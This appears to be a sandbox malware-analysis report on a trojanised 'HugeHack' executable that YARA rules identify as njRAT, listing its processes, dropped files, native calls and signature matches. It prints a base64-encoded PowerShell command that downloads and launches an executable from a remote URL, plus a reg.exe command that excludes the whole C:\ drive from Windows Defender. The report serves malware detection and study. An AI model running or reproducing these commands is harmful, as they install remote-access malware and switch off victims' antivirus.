Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AC86 NtQuerySystemInformation,	2_2_00E8AC86
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AC55 NtQuerySystemInformation,	2_2_00E8AC55
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AF02 NtQuerySystemInformation,	16_2_0098AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098BC72 NtSetInformationProcess,	16_2_0098BC72
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098BC50 NtSetInformationProcess,	16_2_0098BC50
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AED1 NtQuerySystemInformation,	16_2_0098AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAF02 NtQuerySystemInformation,	22_2_013BAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAED1 NtQuerySystemInformation,	22_2_013BAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAF02 NtQuerySystemInformation,	23_2_014EAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAED1 NtQuerySystemInformation,	23_2_014EAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AF02 NtQuerySystemInformation,	25_2_0060AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AED1 NtQuerySystemInformation,	25_2_0060AED1

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_012A139B	2_2_012A139B
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_012A15B3	2_2_012A15B3
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_012A1600	2_2_012A1600
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_0292AF08	3_2_0292AF08
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_0292C1B8	3_2_0292C1B8
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_0292DE28	3_2_0292DE28
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_065B8EE8	3_2_065B8EE8
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_065B9D31	3_2_065B9D31
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F5CB40	3_2_07F5CB40
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F57808	3_2_07F57808
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F577F9	3_2_07F577F9
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F56738	3_2_07F56738
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F59AAF	3_2_07F59AAF
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F5DA47	3_2_07F5DA47
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F9BCC0	3_2_07F9BCC0
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F93BED	3_2_07F93BED
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F90750	3_2_07F90750
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F95AF0	3_2_07F95AF0
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F95ADF	3_2_07F95ADF
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_081109E0	3_2_081109E0
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0099118A	16_2_0099118A
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0099152E	16_2_0099152E
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD0EC0	16_2_00DD0EC0
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DDD038	16_2_00DDD038
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD3D08	16_2_00DD3D08
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD8738	16_2_00DD8738
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD0E90	16_2_00DD0E90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0471B4A0	18_2_0471B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0471B490	18_2_0471B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_083B3A98	18_2_083B3A98

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\webhook.exe 780BF370F55BED41C91E40A07DB66BF12059F38E8AD1B9481DA1748BEA29FF48

PE file contains executable resources (Code or Archives)

Source: HugeHack 1.3.exe.bin.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: HugeHack 1.3.exe.bin.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: HugeHack 1.3.exe.bin.exe	Static PE information: Resource name: RT_RCDATA type: Java archive data (JAR)

Sample file is different than original file name gathered from version info

Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1232460461.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamejavaw.exeN vs HugeHack 1.3.exe.bin.exe
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewebhooker2.exe6 vs HugeHack 1.3.exe.bin.exe

Uses 32bit PE files

Source: HugeHack 1.3.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Yara signature match

Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
